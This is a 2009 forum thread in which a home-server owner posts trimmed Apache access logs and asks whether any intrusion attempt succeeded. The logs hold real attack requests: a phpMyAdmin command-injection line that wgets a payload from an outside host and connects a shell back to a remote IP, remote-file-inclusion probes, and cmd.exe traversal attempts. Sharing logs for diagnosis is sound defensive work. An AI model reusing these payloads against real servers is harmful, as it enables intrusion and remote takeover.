Help! Was my Server Hacked?

Postby svengali » 13. December 2009 21:03

Hello All!

I'm new to this forum, and I'm here for security reasons. A few months ago, I set up a server to share pictures with my friends. I'm using XAMPP 1.7.2 and running Apache 2.0.63 and FileZilla Server. I was not quite familiar with Apache, so I just did the bare minimum. I had a phpMyAdmin password and changed the default accounts and password in FileZilla. I wasn't running MySQL. I have since learnt that Apache is pretty wide open and people have access to it over the network.

I was alarmed by the number of attempts to get into my server through FTP and my website. Although I only have pictures on this server, I am concerned about a breach where someone can control it over the network. I am pretty comfortable with the level of security on the FileZilla server. I have now shut down the server and started securing Apache using instructions from Rob's Notebook (http://robsnotebook.com/xampp-security-hardening). Most of these instructions date back to 2007, but they still seem relevant. (Is that a good assumption to make?)

Anyway, before I restart my server I would like to know if it was breached. I have the Apache access and error log files and I would like some experienced eyes to look at the break-in attempts and tell me if any were successful and what was compromised.

The access file is rather large and includes some of my activities. So I edited it, removing the activity that I recognize. Even then it's pretty large.

I would like to know how to go about posting it. Should I just cut and paste? Is that against the rules or proper forum etiquette to do this? Please advise. Thanks.
svengali
 
Posts: 2
Joined: 13. December 2009 20:06

Re: Help! Was my Server Hacked?

Postby svengali » 16. December 2009 07:01

Ok. I guess it means that it's ok to just do what I want. Well, I always say it's better to ask for forgiveness than to ask for permission.

Anyway, my initial shock and panic has worn off a bit. I did some research, went to a site and looked up all the HTTP browser messages. From what I could tell, it appears that the attempts to get in were unsuccessful. Most of the errors were 400 type. But, I am not an expert.

Still, I have copied the activities below for comments/confirmation from the experts. I basically cut a 3MB file down to 22KB. A lot of the stuff was repetitive. In such cases I use the dots to indicate “more of the same”.

There is one particular attempt that concerns me. It is the first entry below between the asterisks.

Thanks in advance for your feedback. :)
------------------------------------------------------------

************************
202.129.207.68 - - [06/Nov/2009:03:17:37 -0600] "GET /msadc/..?..?..?../winnt/system32/cmd.exe HTTP/1.0" 200 1207 "-" "-"
************************

93.105.142.2 - - [07/Sep/2009:19:05:22 -0500] "GET /phpmyadmin/config/config.inc.php?c=id;uname%20-a HTTP/1.1" 403 1323 "-" "crimscanner/1.0"
93.105.142.2 - - [07/Sep/2009:19:05:22 -0500] "GET /phpMyAdmin/config/config.inc.php?c=id;uname%20-a HTTP/1.1" 403 1323 "-" "crimscanner/1.0"
93.105.142.2 - - [07/Sep/2009:19:05:22 -0500] "GET /PMA/config/config.inc.php?c=id;uname%20-a HTTP/1.1" 404 1163 "-" "crimscanner/1.0"
93.105.142.2 - - [07/Sep/2009:19:05:22 -0500] "GET /pma/config/config.inc.php?c=id;uname%20-a HTTP/1.1" 404 1163 "-" "crimscanner/1.0"
93.105.142.2 - - [07/Sep/2009:19:05:23 -0500] "GET /admin/config/config.inc.php?c=id;uname%20-a HTTP/1.1" 404 1163 "-" "crimscanner/1.0"
93.105.142.2 - - [07/Sep/2009:19:05:23 -0500] "GET /dbadmin/config/config.inc.php?c=id;uname%20-a HTTP/1.1" 404 1163 "-" "crimscanner/1.0"
93.105.142.2 - - [07/Sep/2009:19:05:23 -0500] "GET /mysql/config/config.inc.php?c=id;uname%20-a HTTP/1.1" 404 1163 "-" "crimscanner/1.0"
93.105.142.2 - - [07/Sep/2009:19:05:23 -0500] "GET /myadmin/config/config.inc.php?c=id;uname%20-a HTTP/1.1" 404 1163 "-" "crimscanner/1.0"
93.105.142.2 - - [07/Sep/2009:19:05:23 -0500] "GET /phpmyadmin2/config/config.inc.php?c=id;uname%20-a HTTP/1.1" 403 1323 "-" "crimscanner/1.0"
93.105.142.2 - - [07/Sep/2009:19:05:23 -0500] "GET /phpMyAdmin2/config/config.inc.php?c=id;uname%20-a HTTP/1.1" 403 1323 "-" "crimscanner/1.0"
93.105.142.2 - - [07/Sep/2009:19:05:23 -0500] "GET /phpMyAdmin-2/config/config.inc.php?c=id;uname%20-a HTTP/1.1" 403 1323 "-" "crimscanner/1.0"
93.105.142.2 - - [07/Sep/2009:19:05:24 -0500] "GET /php-my-admin/config/config.inc.php?c=id;uname%20-a HTTP/1.1" 404 1163 "-" "crimscanner/1.0"
.
.
.
93.105.142.2 - - [07/Sep/2009:19:05:27 -0500] "GET /p/m/a/config/config.inc.php?c=id;uname%20-a HTTP/1.1" 500 778 "-" "crimscanner/1.0"
.
.
61.160.216.63 - - [12/Sep/2009:15:57:33 -0500] "GET http://www.wantsfly.com/prx.php?hash=0D ... 61F312ED89 HTTP/1.0" 404 1168 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
.
.
.
61.136.93.9 - - [13/Sep/2009:04:44:06 -0500] "GET http://www.baidu.com/ HTTP/1.1" 200 1015 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)"
61.136.93.6 - - [13/Sep/2009:11:21:33 -0500] "GET http://www.baidu.com/ HTTP/1.1" 200 1015 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)"
61.136.93.6 - - [13/Sep/2009:11:23:54 -0500] "GET http://www.baidu.com/ HTTP/1.1" 200 1015 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)"
88.191.73.171 - - [13/Sep/2009:21:37:04 -0500] "GET ///install.txt HTTP/1.1" 404 1165 "-" "Plesk"
88.191.73.171 - - [14/Sep/2009:00:32:10 -0500] "GET //zencart//install.txt HTTP/1.1" 404 1166 "-" "Plesk"
88.191.73.171 - - [14/Sep/2009:03:32:50 -0500] "GET //shop//install.txt HTTP/1.1" 404 1165 "-" "Plesk"
92.240.68.153 - - [14/Sep/2009:07:22:14 -0500] "GET http://www.gameogre.com/reviewdirectory ... /Trash.jpg HTTP/1.1" 404 1168 "-" "webcollage/1.135a"

124.42.68.136 - - [26/Sep/2009:08:06:01 -0500] "GET /manager/html HTTP/1.1" 404 1165 "-" "Mozilla/3.0 (compatible; Indy Library)"
81.202.166.178 - - [26/Sep/2009:10:07:25 -0500] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 394 "-" "-"
124.42.68.136 - - [26/Sep/2009:10:37:07 -0500] "GET /manager/html HTTP/1.1" 404 1166 "-" "Mozilla/3.0 (compatible; Indy Library)"


208.80.193.32 - - [27/Sep/2009:02:15:37 -0500] "GET / HTTP/1.0" 200 1046 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; yie6_SBC; .NET CLR 1.1.4322; PeoplePal 3.0)"
.
.
211.95.78.112 - - [27/Sep/2009:19:33:00 -0500] "GET http://ant.dsabuse.com/abc.php?auth=45V ... LoginId=43 HTTP/1.1" 404 1167 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"

61.160.216.63 - - [28/Sep/2009:10:43:56 -0500] "GET http://www.wantsfly.com/prx2.php?hash=C ... DEC0633405 HTTP/1.0" 404 1169 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
61.136.93.6 - - [29/Sep/2009:17:56:21 -0500] "GET http://www.baidu.com/ HTTP/1.1" 200 1015 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)"
61.160.216.63 - - [30/Sep/2009:17:14:55 -0500] "GET http://www.wantsfly.com/prx2.php?hash=C ... DEC0633405 HTTP/1.0" 404 1168 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
58.20.108.76 - - [30/Sep/2009:20:03:09 -0500] "GET /scripts/setup.php HTTP/1.1" 404 1165 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
58.20.108.76 - - [30/Sep/2009:20:03:09 -0500] "GET /scripts/setup.php HTTP/1.1" 404 1165 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
58.20.108.76 - - [30/Sep/2009:20:03:10 -0500] "GET /phpMyAdmin/ HTTP/1.1" 403 1328 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
58.20.108.76 - - [30/Sep/2009:20:03:10 -0500] "GET /sql/ HTTP/1.1" 404 1165 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
58.20.108.76 - - [30/Sep/2009:20:03:11 -0500] "GET /mysql/ HTTP/1.1" 404 1165 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

115.22.183.124 - - [01/Oct/2009:05:48:07 -0500] "GET /manager/html HTTP/1.1" 404 1165 "-" "Mozilla/3.0 (compatible; Indy Library)"
115.22.183.124 - - [01/Oct/2009:05:48:08 -0500] "GET /manager/html HTTP/1.1" 404 1165 "-" "Mozilla/3.0 (compatible; Indy Library)"
91.102.66.186 - - [01/Oct/2009:20:36:26 -0500] "GET http://www.icq.com/people HTTP/1.1" 404 1163 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)"

67.205.74.82 - - [02/Oct/2009:07:22:42 -0500] "GET HTTP/1.1 HTTP/1.1" 400 1092 "-" "Toata dragostea mea pentru diavola"
67.205.74.82 - - [02/Oct/2009:07:22:42 -0500] "GET /includes/general.js HTTP/1.1" 404 1165 "-" "Toata dragostea mea pentru diavola"
67.205.74.82 - - [02/Oct/2009:07:22:42 -0500] "GET /zen/includes/general.js HTTP/1.1" 404 1165 "-" "Toata dragostea mea pentru diavola"
67.205.74.82 - - [02/Oct/2009:07:22:42 -0500] "GET /zencart/includes/general.js HTTP/1.1" 404 1165 "-" "Toata dragostea mea pentru diavola"
67.205.74.82 - - [02/Oct/2009:07:22:42 -0500] "GET /zen-cart/includes/general.js HTTP/1.1" 404 1165 "-" "Toata dragostea mea pentru diavola"
67.205.74.82 - - [02/Oct/2009:07:22:43 -0500] "GET /cart/includes/general.js HTTP/1.1" 404 1165 "-" "Toata dragostea mea pentru diavola"
67.205.74.82 - - [02/Oct/2009:07:22:43 -0500] "GET /shop/includes/general.js HTTP/1.1" 404 1165 "-" "Toata dragostea mea pentru diavola"
67.205.74.82 - - [02/Oct/2009:07:22:43 -0500] "GET /store/includes/general.js HTTP/1.1" 404 1165 "-" "Toata dragostea mea pentru diavola"
67.205.74.82 - - [02/Oct/2009:07:22:43 -0500] "GET /E-commerce/includes/general.js HTTP/1.1" 404 1165 "-" "Toata dragostea mea pentru diavola"
67.205.74.82 - - [02/Oct/2009:07:22:43 -0500] "GET /e-commerce/includes/general.js HTTP/1.1" 404 1165 "-" "Toata dragostea mea pentru diavola"
67.205.74.82 - - [02/Oct/2009:07:22:43 -0500] "GET /commerce/includes/general.js HTTP/1.1" 404 1165 "-" "Toata dragostea mea pentru diavola"
61.160.216.63 - - [03/Oct/2009:22:19:18 -0500] "GET http://www.wantsfly.com/prx2.php?hash=C ... DEC0633405 HTTP/1.0" 404 1169 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
92.240.68.153 - - [04/Oct/2009:06:41:53 -0500] "GET http://www.lgsry.com/images/jimthorpe_train7.jpg HTTP/1.1" 404 1165 "-" "webcollage/1.135a"
92.113.84.196 - - [04/Oct/2009:09:08:08 -0500] "GET http://www.cship.info/azenv.php HTTP/1.0" 404 1166 "-" "-"
92.113.84.196 - - [04/Oct/2009:09:08:28 -0500] "GET /" 400 1086 "-" "-"

203.169.225.68 - - [04/Oct/2009:15:23:55 -0500] "GET HTTP/1.1 HTTP/1.1" 400 1092 "-" "Toata dragostea mea pentru diavola"
203.169.225.68 - - [04/Oct/2009:15:23:57 -0500] "GET /mail2//bin/msgimport HTTP/1.1" 404 1165 "-" "Toata dragostea mea pentru diavola"
203.169.225.68 - - [04/Oct/2009:15:23:58 -0500] "GET /roundcubemail//bin/msgimport HTTP/1.1" 404 1165 "-" "Toata dragostea mea pentru diavola"
203.169.225.68 - - [04/Oct/2009:15:23:58 -0500] "GET /rms//bin/msgimport HTTP/1.1" 404 1165 "-" "Toata dragostea mea pentru diavola"
.
.
203.169.225.68 - - [04/Oct/2009:15:24:06 -0500] "GET HTTP/1.1" 400 1088 "-" "-"

95.154.210.100 - - [05/Oct/2009:07:42:14 -0500] "GET http://people.icq.com/people/ HTTP/1.1" 404 1166 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)"
61.160.216.63 - - [05/Oct/2009:12:43:42 -0500] "GET http://www.wantsfly.com/prx2.php?hash=C ... DEC0633405 HTTP/1.0" 404 1169 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
61.156.31.20 - - [05/Oct/2009:22:59:43 -0500] "GET /manager/html HTTP/1.1" 404 1166 "-" "Mozilla/3.0 (compatible; Indy Library)"

64.15.159.169 - - [06/Oct/2009:11:29:23 -0500] "GET //phpMyAdmin//scripts/setup.php HTTP/1.1" 403 1324 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
64.15.159.169 - - [06/Oct/2009:11:29:23 -0500] "GET //phpMyAdmin//scripts/setup.php HTTP/1.1" 403 1326 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
61.160.216.63 - - [06/Oct/2009:13:37:44 -0500] "GET http://www.wantsfly.com/prx2.php?hash=C ... DEC0633405 HTTP/1.0" 404 1168 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
64.15.159.169 - - [06/Oct/2009:15:00:14 -0500] "GET //phpmyadmin//scripts/setup.php HTTP/1.1" 403 1323 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
64.15.159.169 - - [06/Oct/2009:15:00:14 -0500] "GET //phpmyadmin//scripts/setup.php HTTP/1.1" 403 1325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
61.136.93.9 - - [06/Oct/2009:23:40:11 -0500] "GET http://www.baidu.com/ HTTP/1.1" 200 1211 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)"
61.136.93.30 - - [07/Oct/2009:10:22:53 -0500] "GET http://www.baidu.com/ HTTP/1.1" 200 1211 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)"
61.160.216.63 - - [07/Oct/2009:10:57:40 -0500] "GET http://www.wantsfly.com/prx2.php?hash=C ... DEC0633405 HTTP/1.0" 404 1169 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"

82.98.141.7 - - [09/Oct/2009:07:52:33 -0500] "GET /user/soapCaller.bs HTTP/1.1" 404 1165 "-" "Morfeus Fucking Scanner"

88.212.3.30 - - [15/Oct/2009:13:29:16 -0500] "GET //phpMyAdmin/ HTTP/1.1" 403 1329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
88.212.3.30 - - [15/Oct/2009:13:29:16 -0500] "GET //phpmyadmin/ HTTP/1.1" 403 1329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

61.206.183.175 - - [17/Oct/2009:15:53:01 -0500] "POST /_vti_bin/_vti_aut/author.dll HTTP/1.1" 406 - "-" "core-project/1.0"

114.108.177.176 - - [18/Oct/2009:12:40:26 -0500] "GET HTTP/1.1 HTTP/1.1" 400 1094 "-" "Toata dragostea mea pentru diavola"
114.108.177.176 - - [18/Oct/2009:12:40:27 -0500] "GET /roundcube//bin/msgimport HTTP/1.1" 404 1167 "-" "Toata dragostea mea pentru diavola"
114.108.177.176 - - [18/Oct/2009:12:40:27 -0500] "GET /rc//bin/msgimport HTTP/1.1" 404 1167 "-" "Toata dragostea mea pentru diavola"
114.108.177.176 - - [18/Oct/2009:12:40:28 -0500] "GET /mss2//bin/msgimport HTTP/1.1" 404 1167 "-" "Toata dragostea mea pentru diavola"
.
.
.
125.76.230.10 - - [20/Oct/2009:05:48:32 -0500] "GET HTTP/1.1 HTTP/1.1" 400 1093 "-" "Toata dragostea mea pentru diavola"
125.76.230.10 - - [20/Oct/2009:05:48:33 -0500] "GET /install.txt HTTP/1.1" 404 1166 "-" "Toata dragostea mea pentru diavola"

92.240.68.152 - - [21/Oct/2009:09:53:33 -0500] "GET http://goblueridgecard.com/blog/files/2 ... z-sign.jpg HTTP/1.1" 404 1342 "http://www.altavista.com/image/randomlink" "webcollage/1.135a"

189.14.99.218 - - [25/Oct/2009:03:21:00 -0600] "GET /sumthin HTTP/1.0" 404 1162 "-" "-"

24.98.109.144 - - [01/Nov/2009:11:46:33 -0600] "GET http://71.56.95.140/ HTTP/1.0" 200 1210 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

209.175.103.142 - - [03/Nov/2009:13:37:49 -0600] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 394 "-" "-"
209.175.103.142 - - [03/Nov/2009:22:48:09 -0600] "GET /phpmyadmin/main.php HTTP/1.0" 403 1326 "-" "-"
209.175.103.142 - - [03/Nov/2009:22:48:10 -0600] "GET /phpMyAdmin/main.php HTTP/1.0" 403 1326 "-" "-"
209.175.103.142 - - [03/Nov/2009:22:48:10 -0600] "GET /db/main.php HTTP/1.0" 404 1166 "-" "-"
.
.
.
209.175.103.142 - - [03/Nov/2009:22:49:20 -0600] "GET /administrator/phpMyAdmin-2.8.2/main.php HTTP/1.0" 404 1166 "-" "-"

66.7.204.128 - - [04/Nov/2009:18:59:59 -0600] "GET /phpmyadmin/main.php HTTP/1.0" 403 1325 "-" "-"
66.7.204.128 - - [04/Nov/2009:18:59:59 -0600] "GET /phpMyAdmin/main.php HTTP/1.0" 403 1325 "-" "-"
66.7.204.128 - - [04/Nov/2009:18:59:59 -0600] "GET /phpmyadmin/main.php HTTP/1.0" 403 1325 "-" "-"
66.7.204.128 - - [04/Nov/2009:18:59:59 -0600] "GET /phpMyAdmin/main.php HTTP/1.0" 403 1325 "-" "-"
.
.
.
66.7.204.128 - - [04/Nov/2009:19:01:26 -0600] "GET /administrator/phpMyAdmin-2.8.2/main.php HTTP/1.0" 404 1165 "-" "-"

202.129.207.68 - - [06/Nov/2009:03:03:22 -0600] "GET /NULL.printer" 404 1161 "-" "-"
202.129.207.68 - - [06/Nov/2009:03:03:54 -0600] "HEAD / HTTP/1.0" 200 - "-" "-"
202.129.207.68 - - [06/Nov/2009:03:03:56 -0600] "GET /.pl HTTP/1.0" 404 1161 "-" "-"
202.129.207.68 - - [06/Nov/2009:03:03:57 -0600] "GET /*.ida HTTP/1.0" 403 1149 "-" "-"
202.129.207.68 - - [06/Nov/2009:03:04:01 -0600] "GET /........../autoexec.bat HTTP/1.0" 403 1149 "-" "-"
202.129.207.68 - - [06/Nov/2009:03:04:02 -0600] "GET /....../ all HTTP/1.0" 403 1163 "-" "-"
202.129.207.68 - - [06/Nov/2009:03:06:06 -0600] "GET /.htaccess HTTP/1.0" 403 1149 "-" "-"
202.129.207.68 - - [06/Nov/2009:03:06:07 -0600] "GET /.htaccess HTTP/1.0" 403 1149 "-" "-"
202.129.207.68 - - [06/Nov/2009:03:06:30 -0600] "GET /_mem_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe HTTP/1.0" 404 1161 "-" "-"
.
.
.

************************
202.129.207.68 - - [06/Nov/2009:03:17:37 -0600] "GET /msadc/..?..?..?../winnt/system32/cmd.exe HTTP/1.0" 200 1207 "-" "-"
************************

61.146.233.114 - - [06/Nov/2009:20:43:08 -0600] "GET /vhcs2/ HTTP/1.0" 404 1165 "-" "Wget/1.10.2 (Red Hat modified)"

59.56.110.138 - - [07/Nov/2009:15:35:21 -0600] "GET http://www.intel.com/ HTTP/1.1" 200 1211 "-" "Mozilla/5.0 (compatible; MSIE 5.01; Win2000)"

212.214.41.52 - - [14/Nov/2009:00:28:10 -0600] "GET // HTTP/1.1" 200 5795 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

128.10.19.251 - - [15/Nov/2009:11:34:48 -0600] "HEAD /customer2.ibcWT.aac=hpIlBlogon/index.php HTTP/1.0" 404 - "-" "Wget/1.11.1"

203.152.210.122 - - [18/Nov/2009:06:16:05 -0600] "GET /a1b2c3d4e5f6g7h8i9/nonexistentfile.php HTTP/1.0" 404 1162 "-" "-"
203.152.210.122 - - [18/Nov/2009:06:16:06 -0600] "GET /adxmlrpc.php HTTP/1.0" 404 1162 "-" "-"
203.152.210.122 - - [18/Nov/2009:06:16:06 -0600] "GET /adserver/adxmlrpc.php HTTP/1.0" 404 1162 "-" "-"

92.240.68.152 - - [19/Nov/2009:14:17:53 -0600] "GET http://www.ltscotland.org.uk/healthykid ... imming.gif HTTP/1.1" 404 1174 "-" "webcollage/1.135a"

67.225.136.24 - - [20/Nov/2009:07:10:41 -0600] "GET /components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=http://67.225.136.24/1.gif?/ HTTP/1.1" 404 1166 "-" "Morfeus Fucking Scanner"
67.225.136.24 - - [20/Nov/2009:07:10:41 -0600] "GET /joomla/components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=http://67.225.136.24/1.gif?/ HTTP/1.1" 404 1166 "-" "Morfeus Fucking Scanner"
67.225.136.24 - - [20/Nov/2009:07:10:41 -0600] "GET /administrator/components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=http://67.225.136.24/1.gif?/ HTTP/1.1" 404 1166 "-" "Morfeus Fucking Scanner"
67.225.136.24 - - [20/Nov/2009:07:10:41 -0600] "GET /admin/index.php?_SERVER[DOCUMENT_ROOT]=http://67.225.136.24/1.gif?/ HTTP/1.1" 404 1166 "-" "Morfeus Fucking Scanner"
67.225.136.24 - - [20/Nov/2009:07:10:41 -0600] "GET /tools/calendar.php?_SERVER[DOCUMENT_ROOT]=http://67.225.136.24/1.gif?/ HTTP/1.1" 404 1166 "-" "Morfeus Fucking Scanner"
67.225.136.24 - - [20/Nov/2009:07:10:41 -0600] "GET /rss.php?_SERVER[DOCUMENT_ROOT]=http://67.225.136.24/1.gif?/ HTTP/1.1" 404 1166 "-" "Morfeus Fucking Scanner"
67.225.136.24 - - [20/Nov/2009:07:10:42 -0600] "GET /BX_ROOT/click.php?_SERVER[DOCUMENT_ROOT]=http://67.225.136.24/1.gif?/ HTTP/1.1" 404 1166 "-" "Morfeus Fucking Scanner"

92.68.249.36 - - [20/Nov/2009:14:55:19 -0600] "GET //phpmyadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 403 1326 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
92.68.249.36 - - [20/Nov/2009:14:55:19 -0600] "GET //pma/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 1166 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
92.68.249.36 - - [20/Nov/2009:14:55:19 -0600] "GET //admin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 1166 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
92.68.249.36 - - [20/Nov/2009:14:55:20 -0600] "GET //dbadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 1166 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
92.68.249.36 - - [20/Nov/2009:14:55:20 -0600] "GET //mysql/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 1166 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
92.68.249.36 - - [20/Nov/2009:14:55:20 -0600] "GET //php-my-admin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 1166 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
92.68.249.36 - - [20/Nov/2009:14:55:21 -0600] "GET //myadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 1166 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
92.68.249.36 - - [20/Nov/2009:14:55:21 -0600] "GET //PHPMYADMIN/config/config.inc.php?p=phpinfo(); HTTP/1.1" 403 1326 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
92.68.249.36 - - [20/Nov/2009:14:55:21 -0600] "GET //phpMyAdmin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 403 1326 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
92.68.249.36 - - [20/Nov/2009:14:55:22 -0600] "GET //p/m/a/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 1166 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

216.177.193.90 - - [20/Nov/2009:21:08:29 -0600] "GET //phpmyadmin//scripts/setup.php HTTP/1.1" 403 1326 "-" "curl/7.16.4 (x86_64-redhat-linux-gnu) libcurl/7.16.4 NSS/3.11.7.1 zlib/1.2.3 libidn/0.6.14"
216.177.193.90 - - [20/Nov/2009:21:08:31 -0600] "GET //phpmyadmin//config/config.inc.php?c=cd%20/tmp;wget%20http://adoglife.com/nc.tgz;perl%20nc.tgz%2061.75.175.137%208080;rm%20-rf%20 HTTP/1.1" 403 1326 "-" "libwww-perl/5.808"
216.177.193.90 - - [20/Nov/2009:21:08:31 -0600] "GET //phpMyAdmin//scripts/setup.php HTTP/1.1" 403 1326 "-" "curl/7.16.4 (x86_64-redhat-linux-gnu) libcurl/7.16.4 NSS/3.11.7.1 zlib/1.2.3 libidn/0.6.14"
216.177.193.90 - - [20/Nov/2009:21:08:32 -0600] "GET //phpMyAdmin//config/config.inc.php?c=cd%20/tmp;wget%20http://adoglife.com/nc.tgz;perl%20nc.tgz%2061.75.175.137%208080;rm%20-rf%20 HTTP/1.1" 403 1326 "-" "libwww-perl/5.808"

68.90.62.2 - - [22/Nov/2009:23:21:23 -0600] "\xbad" 501 1097 "-" "-"

78.129.203.130 - - [29/Nov/2009:07:02:51 -0600] "GET //phpmyadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 403 1326 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
78.129.203.130 - - [29/Nov/2009:07:02:52 -0600] "GET //pma/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 1166 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
78.129.203.130 - - [29/Nov/2009:07:02:52 -0600] "GET //admin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 1166 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

91.120.21.66 - - [05/Dec/2009:05:16:08 -0600] "GET //phpmyadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 403 1325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.120.21.66 - - [05/Dec/2009:05:16:08 -0600] "GET //phpMyAdmin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 403 1325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
91.120.21.66 - - [05/Dec/2009:05:16:09 -0600] "GET //PMA/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 1165 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
.
.
.
91.120.21.66 - - [05/Dec/2009:05:16:37 -0600] "GET //mysql-admin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 1165 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

87.230.74.45 - - [06/Dec/2009:00:14:30 -0600] "GET /din.aspx?s=00000000&client=DynGate&rnd=286487872&p=10000001 HTTP/1.1" 404 1166 "-" "Mozilla/4.0 (compatible; MSIE 6.0; DynGate)"

61.160.216.63 - - [06/Dec/2009:10:50:05 -0600] "GET http://www.wantsfly.com/prx2.php?hash=8 ... 3EF2F58C2B HTTP/1.0" 404 1169 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
61.136.208.20 - - [06/Dec/2009:17:55:44 -0600] "GET //admin/ HTTP/1.1" 404 1165 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
61.136.208.20 - - [06/Dec/2009:17:55:45 -0600] "GET //admin/pma/ HTTP/1.1" 404 1165 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
61.136.208.20 - - [06/Dec/2009:17:55:45 -0600] "GET //admin/phpmyadmin/ HTTP/1.1" 404 1165 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
61.136.208.20 - - [06/Dec/2009:17:55:46 -0600] "GET //db/ HTTP/1.1" 404 1165 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
.
.
.
61.136.208.20 - - [06/Dec/2009:17:55:43 -0600] "GET // HTTP/1.1" 200 5851 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"

127.0.0.1 - - [07/Dec/2009:00:41:46 -0600] "GET /phpmyadmin/js/mooRainbow/mooRainbow.css HTTP/1.1" 200 2270 "http://localhost/phpmyadmin/main.php?lang=en-utf-8&convcharset=utf-8&collation_connection=utf8_general_ci&token=9023f53694879f51c2e92ecff5878e8f&phpMyAdmin=srmapami6c9fava0s18qsv75ehbcuf1n" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
svengali
 
Posts: 2
Joined: 13. December 2009 20:06

Re: Help! Was my Server Hacked?

Postby asegur » 11. January 2010 13:15

Hello. I am getting similar log lines, but in some of them Apache gives response 301:

213.145.134.166 - - [10/Jan/2010:08:32:12 +0100] "GET //p/m/a/config/config.inc.php?p=phpinfo(); HTTP/1.1" 301 316 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

I read that 301 is a redirection answer, but I don't understand why this response is given, and/or where Apache is redirecting this request to.

Does this mean that the attack is getting some result?

Please help. Thanks.
asegur
 
Posts: 1
Joined: 11. January 2010 13:10
